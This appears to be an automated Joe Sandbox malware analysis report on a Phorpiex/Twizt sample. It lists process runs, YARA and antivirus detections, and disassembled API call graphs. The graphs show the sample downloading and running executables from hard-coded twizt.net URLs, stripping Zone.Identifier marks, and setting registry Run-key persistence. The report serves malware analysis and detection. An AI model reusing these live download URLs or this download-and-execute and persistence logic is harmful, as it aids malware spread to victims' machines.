                                                                        • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000003.00000000.2130434531.0000000000410000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000003.00000002.4537142040.0000000004680000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000003.00000003.2155970673.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\AppData\Local\Temp\135143440.exe, Author: Joe Security
                                                                        Antivirus matches:
                                                                        • Detection: 100%, Avira
                                                                        • Detection: 100%, Joe Sandbox ML
                                                                        • Detection: 65%, ReversingLabs
                                                                        Reputation:low
                                                                        Has exited:false

                                                                        Target ID:5
                                                                        Start time:10:07:13
                                                                        Start date:24/04/2024
                                                                        Path:C:\Users\user\sysvratrel.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\sysvratrel.exe"
                                                                        Imagebase:0x400000
                                                                        File size:86'016 bytes
                                                                        MD5 hash:36010B83BCCFCD1032971DF9FC5082A1
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000005.00000000.2271817239.0000000000410000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\sysvratrel.exe, Author: Joe Security
                                                                        • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\sysvratrel.exe, Author: Joe Security
                                                                        Antivirus matches:
                                                                        • Detection: 100%, Avira
                                                                        • Detection: 100%, Avira
                                                                        • Detection: 100%, Joe Sandbox ML
                                                                        • Detection: 100%, Joe Sandbox ML
                                                                        • Detection: 65%, ReversingLabs
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        Target ID:6
                                                                        Start time:10:07:14
                                                                        Start date:24/04/2024
                                                                        Path:C:\Users\user\AppData\Local\Temp\1682018248.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Users\user\AppData\Local\Temp\1682018248.exe
                                                                        Imagebase:0x400000
                                                                        File size:86'016 bytes
                                                                        MD5 hash:CD1D9C0ED8763E6BB3EE7EFB133DC60E
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000006.00000002.2302759915.0000000000410000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000006.00000000.2281377330.0000000000410000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\AppData\Local\Temp\1682018248.exe, Author: Joe Security
                                                                        Antivirus matches:
                                                                        • Detection: 100%, Avira
                                                                        • Detection: 100%, Joe Sandbox ML
                                                                        • Detection: 79%, ReversingLabs
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        Target ID:7
                                                                        Start time:10:07:21
                                                                        Start date:24/04/2024
                                                                        Path:C:\Windows\sysvratrel.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Windows\sysvratrel.exe"
                                                                        Imagebase:0x400000
                                                                        File size:86'016 bytes
                                                                        MD5 hash:36010B83BCCFCD1032971DF9FC5082A1
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000007.00000002.2374046156.0000000000410000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000007.00000000.2353210053.0000000000410000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                        Antivirus matches:
                                                                        • Detection: 65%, ReversingLabs
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        Target ID:8
                                                                        Start time:10:07:30
                                                                        Start date:24/04/2024
                                                                        Path:C:\Users\user\sysvratrel.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\sysvratrel.exe"
                                                                        Imagebase:0x400000
                                                                        File size:86'016 bytes
                                                                        MD5 hash:36010B83BCCFCD1032971DF9FC5082A1
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000008.00000000.2439729123.0000000000410000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000008.00000002.2460154495.0000000000410000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        Reset < >

                                                                          Execution Graph

                                                                          Execution Coverage:37.6%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:27.6%
                                                                          Total number of Nodes:87
                                                                          Total number of Limit Nodes:5
                                                                          execution_graph 301 531aa5 _except_handler4_common 263 531479 268 531885 263->268 266 5314b6 _amsg_exit 267 5314be 266->267 271 5317e0 268->271 270 53147e __getmainargs 270->266 270->267 278 531a4c 271->278 273 5317ec _decode_pointer 274 531803 _onexit 273->274 275 53180f 7 API calls 273->275 276 531873 __onexit 274->276 279 53187c _unlock 275->279 276->270 278->273 279->276 280 531639 _XcptFilter 302 531789 303 5317c5 302->303 305 53179b 302->305 304 5317c0 ?terminate@ 304->303 305->303 305->304 306 531bc8 IsDebuggerPresent _crt_debugger_hook SetUnhandledExceptionFilter UnhandledExceptionFilter 307 531cb2 _crt_debugger_hook 306->307 308 531cba GetCurrentProcess TerminateProcess 306->308 307->308 209 5314bf 227 531a4c 209->227 211 5314cb GetStartupInfoA 212 5314f9 211->212 213 53150b 212->213 214 531512 Sleep 212->214 215 531535 213->215 216 53152b _amsg_exit 213->216 214->212 217 53155e 215->217 218 53153e _initterm_e 215->218 216->217 219 53156d _initterm 217->219 222 531588 __IsNonwritableInCurrentImage 217->222 218->217 220 531559 __onexit 218->220 219->222 221 531623 _ismbblead 221->222 222->221 223 531668 222->223 226 53160d exit 222->226 228 531430 Sleep 222->228 223->220 224 531671 _cexit 223->224 224->220 226->222 227->211 235 531080 7 API calls 228->235 233 53145c 233->222 236 531252 InternetCloseHandle Sleep 235->236 237 531120 InternetOpenUrlW 235->237 240 53131a 236->240 241 531279 rand rand wsprintfW URLDownloadToFileW 236->241 238 531245 InternetCloseHandle 237->238 239 53114c CreateFileW 237->239 238->236 242 53117b InternetReadFile 239->242 243 531238 CloseHandle 239->243 253 531390 ExpandEnvironmentStringsW wsprintfW PathFileExistsW 240->253 241->240 244 5312d7 wsprintfW DeleteFileW Sleep 241->244 245 53119f 242->245 246 5311ce CloseHandle Sleep wsprintfW DeleteFileW Sleep 242->246 243->238 247 531000 4 API calls 244->247 245->246 248 5311a8 WriteFile 245->248 260 531000 memset memset CreateProcessW 246->260 250 531317 247->250 248->242 250->240 252 531231 252->243 254 5313e3 CreateFileW 253->254 255 5313dd 253->255 254->255 256 53140e FindCloseChangeNotification 254->256 255->233 257 531320 InternetOpenA 255->257 256->255 258 531342 InternetOpenUrlA Sleep InternetCloseHandle 257->258 259 531371 Sleep InternetCloseHandle 257->259 258->259 259->233 261 531062 Sleep 260->261 262 531071 260->262 261->262 262->243 262->252 281 53177f 284 531af8 281->284 283 531784 283->283 285 531b2a GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 284->285 286 531b1d 284->286 287 531b21 285->287 286->285 286->287 287->283 288 53169e 290 5316ac __set_app_type _encode_pointer __p__fmode __p__commode 288->290 291 53174b _pre_c_init __RTC_Initialize 290->291 292 531765 291->292 293 531759 __setusermatherr 291->293 298 531aca _controlfp_s 292->298 293->292 296 531773 _configthreadlocale 297 53177c 296->297 299 53176a 298->299 300 531ae6 _invoke_watson 298->300 299->296 299->297 300->299 309 53164d 310 531661 _exit 309->310 311 531668 309->311 310->311 312 531671 _cexit 311->312 313 531677 __onexit 311->313 312->313

                                                                          Callgraph

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetTickCount.KERNEL32 ref: 00531089
                                                                          • srand.MSVCR90 ref: 00531090
                                                                          • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 005310B0
                                                                          • rand.MSVCR90 ref: 005310B6
                                                                          • rand.MSVCR90 ref: 005310CA
                                                                          • wsprintfW.USER32 ref: 005310F1
                                                                          • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00531107
                                                                          • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00531133
                                                                          • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00531162
                                                                          • InternetReadFile.WININET(00000000,?,00000103,?), ref: 00531195
                                                                          • WriteFile.KERNELBASE(000000FF,?,00000000,?,00000000), ref: 005311C6
                                                                          • CloseHandle.KERNEL32(000000FF), ref: 005311D5
                                                                          • Sleep.KERNELBASE(000003E8), ref: 005311E0
                                                                          • wsprintfW.USER32 ref: 005311F9
                                                                          • DeleteFileW.KERNELBASE(?), ref: 00531209
                                                                          • Sleep.KERNELBASE(000003E8), ref: 00531214
                                                                          • CloseHandle.KERNEL32(000000FF), ref: 0053123F
                                                                          • InternetCloseHandle.WININET(00000000), ref: 0053124C
                                                                          • InternetCloseHandle.WININET(00000000), ref: 00531259
                                                                          • Sleep.KERNEL32(000003E8), ref: 00531264
                                                                          • rand.MSVCR90 ref: 00531279
                                                                          • rand.MSVCR90 ref: 0053128D
                                                                          • wsprintfW.USER32 ref: 005312B4
                                                                          • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 005312CE
                                                                          • wsprintfW.USER32 ref: 005312EA
                                                                          • DeleteFileW.KERNEL32(?), ref: 005312FA
                                                                          • Sleep.KERNEL32(000003E8), ref: 00531305
                                                                          Strings
                                                                          • %s\%d%d.exe, xrefs: 005312A8
                                                                          • %s:Zone.Identifier, xrefs: 005312DE
                                                                          • %s\%d%d.exe, xrefs: 005310E5
                                                                          • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36, xrefs: 00531102
                                                                          • %s:Zone.Identifier, xrefs: 005311ED
                                                                          • %temp%, xrefs: 005310AB
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2175623547.0000000000531000.00000020.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                                          • Associated: 00000000.00000002.2175610447.0000000000530000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2175637252.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2175650899.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_530000_957C4XK6Lt.jbxd
                                                                          Similarity
                                                                          • API ID: File$Internet$CloseHandleSleeprandwsprintf$DeleteOpen$CountCreateDownloadEnvironmentExpandReadStringsTickWritesrand
                                                                          • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                          • API String ID: 1642989748-1161929716
                                                                          • Opcode ID: 93b20563d106dd7e77837c963f891c77f1280e3bd7db06603c5f8e81d8eccb0b
                                                                          • Instruction ID: f8f757ce8c7913167954f9a37337be34aa126220793e111de369071fd5b00feb
                                                                          • Opcode Fuzzy Hash: 93b20563d106dd7e77837c963f891c77f1280e3bd7db06603c5f8e81d8eccb0b
                                                                          • Instruction Fuzzy Hash: 28619075940B18ABDB29DB60DC8EBEA7779BB58702F004598F30D921D0DB746B88CF64
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00531333
                                                                          • InternetOpenUrlA.WININET(00000000,http://twizt.net/peinstall.php,00000000,00000000,00000000,00000000), ref: 00531353
                                                                          • Sleep.KERNELBASE(000003E8), ref: 00531361
                                                                          • InternetCloseHandle.WININET(?), ref: 0053136B
                                                                          • Sleep.KERNELBASE(000003E8), ref: 00531376
                                                                          • InternetCloseHandle.WININET(00000000), ref: 00531380
                                                                          Strings
                                                                          • http://twizt.net/peinstall.php, xrefs: 0053134A
                                                                          • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36, xrefs: 0053132E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2175623547.0000000000531000.00000020.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                                          • Associated: 00000000.00000002.2175610447.0000000000530000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2175637252.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2175650899.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_530000_957C4XK6Lt.jbxd
                                                                          Similarity
                                                                          • API ID: Internet$CloseHandleOpenSleep
                                                                          • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36$http://twizt.net/peinstall.php
                                                                          • API String ID: 256278798-2653881570
                                                                          • Opcode ID: 784d1a12f0a84e088c398efeed09d137ab517eb0b0d178e1f17923eb7fcf5f0e
                                                                          • Instruction ID: b53fb677b2877d558295a2ef72f4a66ba09f566db235cf5a5a4c14d204d38fee
                                                                          • Opcode Fuzzy Hash: 784d1a12f0a84e088c398efeed09d137ab517eb0b0d178e1f17923eb7fcf5f0e
                                                                          • Instruction Fuzzy Hash: E9F05438A80704FBE7289BA4DD4EF5C7BB4AB58B01F204545BB02763D0D6B06648DB15
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 005313AA
                                                                          • wsprintfW.USER32 ref: 005313C3
                                                                          • PathFileExistsW.KERNELBASE(?), ref: 005313D3
                                                                          • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000001,00000002,00000000), ref: 005313F9
                                                                          • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 00531415
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2175623547.0000000000531000.00000020.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                                          • Associated: 00000000.00000002.2175610447.0000000000530000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2175637252.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2175650899.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_530000_957C4XK6Lt.jbxd
                                                                          Similarity
                                                                          • API ID: File$ChangeCloseCreateEnvironmentExistsExpandFindNotificationPathStringswsprintf
                                                                          • String ID: %s\33573537.jpg$%temp%
                                                                          • API String ID: 2220190937-2829634191
                                                                          • Opcode ID: d6b0f7190c55c125a46478fd5d671e23cf98e4c47d01b6fc2c26c0ed34a8d6c6
                                                                          • Instruction ID: d53cb4a754e031f216887dec5f03662e4fba04be963ee53a240db83fa2fac5bc
                                                                          • Opcode Fuzzy Hash: d6b0f7190c55c125a46478fd5d671e23cf98e4c47d01b6fc2c26c0ed34a8d6c6
                                                                          • Instruction Fuzzy Hash: CD01A7B4540708ABDB24DB60DC4DFE57738BB40704F0089A4B719961D1D6B05ACDDFA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 27 531000-531060 memset * 2 CreateProcessW 28 531062-53106f Sleep 27->28 29 531071 27->29 30 531073-531076 28->30 29->30
                                                                          APIs
                                                                          • memset.MSVCR90 ref: 0053100E
                                                                          • memset.MSVCR90 ref: 0053101E
                                                                          • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00531057
                                                                          • Sleep.KERNELBASE(000003E8), ref: 00531067
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2175623547.0000000000531000.00000020.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                                          • Associated: 00000000.00000002.2175610447.0000000000530000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2175637252.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2175650899.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_530000_957C4XK6Lt.jbxd
                                                                          Similarity
                                                                          • API ID: memset$CreateProcessSleep
                                                                          • String ID: D
                                                                          • API String ID: 3916249126-2746444292
                                                                          • Opcode ID: d0f04092d25710cf9668442a737fc5faaf8f15da7577434d4a7d096daab652a9
                                                                          • Instruction ID: 41c8592c218aa2b824b2ef44697ff255d45c654551186d2c09cee6d71f3f7e25
                                                                          • Opcode Fuzzy Hash: d0f04092d25710cf9668442a737fc5faaf8f15da7577434d4a7d096daab652a9
                                                                          • Instruction Fuzzy Hash: 36014471A80748B7EB149BE0CC4BFEE7B78AB68B00F100115F7046E1C1DAB5A5488B99
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 31 531430-531455 Sleep call 531080 call 531390 36 531457 call 531320 31->36 37 53145c-53145f 31->37 36->37
                                                                          APIs
                                                                          • Sleep.KERNELBASE(000007D0), ref: 00531438
                                                                            • Part of subcall function 00531080: GetTickCount.KERNEL32 ref: 00531089
                                                                            • Part of subcall function 00531080: srand.MSVCR90 ref: 00531090
                                                                            • Part of subcall function 00531080: ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 005310B0
                                                                            • Part of subcall function 00531080: rand.MSVCR90 ref: 005310B6
                                                                            • Part of subcall function 00531080: rand.MSVCR90 ref: 005310CA
                                                                            • Part of subcall function 00531080: wsprintfW.USER32 ref: 005310F1
                                                                            • Part of subcall function 00531080: InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00531107
                                                                            • Part of subcall function 00531080: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00531133
                                                                            • Part of subcall function 00531080: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00531162
                                                                            • Part of subcall function 00531080: InternetReadFile.WININET(00000000,?,00000103,?), ref: 00531195
                                                                            • Part of subcall function 00531080: WriteFile.KERNELBASE(000000FF,?,00000000,?,00000000), ref: 005311C6
                                                                            • Part of subcall function 00531080: CloseHandle.KERNEL32(000000FF), ref: 005311D5
                                                                            • Part of subcall function 00531080: Sleep.KERNELBASE(000003E8), ref: 005311E0
                                                                            • Part of subcall function 00531080: wsprintfW.USER32 ref: 005311F9
                                                                            • Part of subcall function 00531390: ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 005313AA
                                                                            • Part of subcall function 00531390: wsprintfW.USER32 ref: 005313C3
                                                                            • Part of subcall function 00531390: PathFileExistsW.KERNELBASE(?), ref: 005313D3
                                                                            • Part of subcall function 00531320: InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00531333
                                                                            • Part of subcall function 00531320: InternetOpenUrlA.WININET(00000000,http://twizt.net/peinstall.php,00000000,00000000,00000000,00000000), ref: 00531353
                                                                            • Part of subcall function 00531320: Sleep.KERNELBASE(000003E8), ref: 00531361
                                                                            • Part of subcall function 00531320: InternetCloseHandle.WININET(?), ref: 0053136B
                                                                            • Part of subcall function 00531320: Sleep.KERNELBASE(000003E8), ref: 00531376
                                                                            • Part of subcall function 00531320: InternetCloseHandle.WININET(00000000), ref: 00531380
                                                                          Strings
                                                                          • http://twizt.net/newtpp.exe, xrefs: 0053143E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2175623547.0000000000531000.00000020.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                                                          • Associated: 00000000.00000002.2175610447.0000000000530000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2175637252.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2175650899.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_530000_957C4XK6Lt.jbxd
                                                                          Similarity
                                                                          • API ID: Internet$FileOpenSleep$CloseHandlewsprintf$EnvironmentExpandStringsrand$CountCreateExistsPathReadTickWritesrand
                                                                          • String ID: http://twizt.net/newtpp.exe
                                                                          • API String ID: 1220973231-3495472230
                                                                          • Opcode ID: ec0aafc06127534a134bedc5a3af30d3f4ccae158571950ed0815cab13feec86
                                                                          • Instruction ID: e34f819b93c19fb18f3829af1fb0b800374b2b8bf993e62657c614703feb35a7
                                                                          • Opcode Fuzzy Hash: ec0aafc06127534a134bedc5a3af30d3f4ccae158571950ed0815cab13feec86
                                                                          • Instruction Fuzzy Hash: 79D01271544B0617950532F16D0F66A3F9C7A50795F440C22F506C4583ED85E01D64BB
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Execution Graph

                                                                          Execution Coverage:14.7%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:16.6%
                                                                          Total number of Nodes:1456
                                                                          Total number of Limit Nodes:38
                                                                          execution_graph 5903 4074c1 ExitThread 6048 40e361 6050 40e36a 6048->6050 6049 40e45d 6050->6049 6051 40e3d3 lstrcmpiW 6050->6051 6052 40e453 SysFreeString 6051->6052 6053 40e3e6 6051->6053 6052->6049 6054 40e150 2 API calls 6053->6054 6056 40e3f4 6054->6056 6055 40e445 6055->6052 6056->6052 6056->6055 6057 40e423 lstrcmpiW 6056->6057 6058 40e435 6057->6058 6059 40e43b SysFreeString 6057->6059 6058->6059 6059->6055 6060 40f0e4 6061 40f102 6060->6061 6063 40f198 6060->6063 6062 40f319 NtQueryVirtualMemory 6061->6062 6065 40f11d 6062->6065 6064 40f204 RtlUnwind 6064->6065 6065->6063 6065->6064 6066 405fe5 6067 405f5e 6066->6067 6068 405fea LeaveCriticalSection 6067->6068 6069 40a460 8 API calls 6067->6069 6070 405fbc 6069->6070 6070->6068 6071 4069a5 6074 40694b 6071->6074 6072 40697b lstrcmpiW 6072->6074 6073 406af6 FindNextFileW 6075 406b12 FindClose 6073->6075 6076 40691f lstrcmpW 6073->6076 6074->6072 6074->6073 6077 4069e2 PathMatchSpecW 6074->6077 6081 406a60 PathFileExistsW 6074->6081 6084 406510 11 API calls 6074->6084 6079 406b1f 6075->6079 6076->6074 6080 406935 lstrcmpW 6076->6080 6077->6074 6078 406a03 wsprintfW SetFileAttributesW DeleteFileW 6077->6078 6078->6074 6080->6074 6081->6074 6082 406a76 wsprintfW wsprintfW 6081->6082 6082->6074 6083 406ae0 MoveFileExW 6082->6083 6083->6073 6084->6074 5916 406b86 5917 406b68 5916->5917 5918 406ca8 Sleep 5917->5918 5919 406b99 5917->5919 5921 406cb8 ExitThread 5917->5921 5923 406340 4 API calls 5917->5923 5918->5917 5920 406260 4 API calls 5919->5920 5922 406baa 5920->5922 5924 406bd0 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5922->5924 5925 406bcb 5922->5925 5923->5917 5926 406c46 wsprintfW 5924->5926 5927 406c5b wsprintfW 5924->5927 5926->5927 5928 406650 49 API calls 5927->5928 5928->5925 5929 407d89 5930 407d92 5929->5930 5931 407da1 34 API calls 5930->5931 5932 408bd6 5930->5932 5947 40a4ce 5948 40a3f0 __aligned_recalloc_base 3 API calls 5947->5948 5951 40a48d 5948->5951 5949 40a4a2 5950 40a1e0 _invalid_parameter 7 API calls 5950->5951 5951->5949 5951->5950 5952 40a4a4 memcpy 5951->5952 5952->5951 4354 4074d0 Sleep CreateMutexA GetLastError 4355 407506 ExitProcess 4354->4355 4356 40750e 6 API calls 4354->4356 4357 4075b3 4356->4357 4358 40773a Sleep RegOpenKeyExW 4356->4358 4414 40e970 GetLocaleInfoA strcmp 4357->4414 4359 407793 RegOpenKeyExW 4358->4359 4360 407767 RegSetValueExA RegCloseKey 4358->4360 4362 4077b5 RegSetValueExA RegCloseKey 4359->4362 4363 4077e6 RegOpenKeyExW 4359->4363 4360->4359 4365 4078e2 RegOpenKeyExW 4362->4365 4366 407808 RegCreateKeyExW RegCloseKey 4363->4366 4367 40783d RegOpenKeyExW 4363->4367 4372 407930 RegOpenKeyExW 4365->4372 4373 407904 RegSetValueExA RegCloseKey 4365->4373 4366->4367 4370 407894 RegOpenKeyExW 4367->4370 4371 40785f RegCreateKeyExW RegCloseKey 4367->4371 4368 4075c0 ExitProcess 4369 4075c8 ExpandEnvironmentStringsW wsprintfW CopyFileW 4374 407687 Sleep wsprintfW CopyFileW 4369->4374 4375 407618 SetFileAttributesW RegOpenKeyExW 4369->4375 4370->4365 4377 4078b6 RegSetValueExA RegCloseKey 4370->4377 4371->4370 4379 407952 RegSetValueExA RegCloseKey 4372->4379 4380 40797e RegOpenKeyExA 4372->4380 4373->4372 4374->4358 4376 4076cb SetFileAttributesW RegOpenKeyExW 4374->4376 4375->4374 4378 407649 wcslen RegSetValueExW RegCloseKey 4375->4378 4376->4358 4381 4076fc wcslen RegSetValueExW RegCloseKey 4376->4381 4377->4365 4378->4374 4379->4380 4382 4079a4 8 API calls 4380->4382 4383 407a8a RegOpenKeyExA 4380->4383 4381->4358 4382->4383 4384 407ab0 8 API calls 4383->4384 4385 407b96 Sleep 4383->4385 4384->4385 4416 40ca10 4385->4416 4388 407d20 4389 407bb1 9 API calls 4419 405b60 InitializeCriticalSection CreateFileW 4389->4419 5705 405820 4389->5705 5714 406b30 Sleep GetModuleFileNameW 4389->5714 5729 407380 4389->5729 4395 407c66 CreateEventA 4451 40c140 4395->4451 4404 40d3a0 337 API calls 4405 407cc6 4404->4405 4406 40d3a0 337 API calls 4405->4406 4407 407ce2 4406->4407 4408 40d3a0 337 API calls 4407->4408 4409 407cfd 4408->4409 4496 40d510 GetCurrentThread GetThreadPriority GetCurrentThread SetThreadPriority 4409->4496 4411 407d0e 4505 40d650 4411->4505 4415 4075b8 4414->4415 4415->4368 4415->4369 4514 40c9e0 4416->4514 4420 405c85 4419->4420 4421 405b98 CreateFileMappingW 4419->4421 4433 40d880 CoInitializeEx 4420->4433 4422 405bb9 MapViewOfFile 4421->4422 4423 405c7b CloseHandle 4421->4423 4424 405c71 CloseHandle 4422->4424 4425 405bd8 GetFileSize 4422->4425 4423->4420 4424->4423 4427 405bed 4425->4427 4426 405c67 UnmapViewOfFile 4426->4424 4427->4426 4429 405c2c 4427->4429 4432 405bfc 4427->4432 4643 40ca60 4427->4643 4650 405c90 4427->4650 4430 40a3f0 __aligned_recalloc_base 3 API calls 4429->4430 4430->4432 4432->4426 4963 40d950 socket 4433->4963 4435 407c61 4446 406f50 CoInitializeEx SysAllocString 4435->4446 4436 40d928 5007 40a510 4436->5007 4439 40d8ea 4988 40acc0 htons 4439->4988 4440 40d8a0 4440->4435 4440->4436 4440->4439 4973 40dbc0 4440->4973 4445 40e6b0 24 API calls 4445->4436 4447 406f72 4446->4447 4448 406f88 CoUninitialize 4446->4448 5152 406fa0 4447->5152 4448->4395 5161 40c100 4451->5161 4454 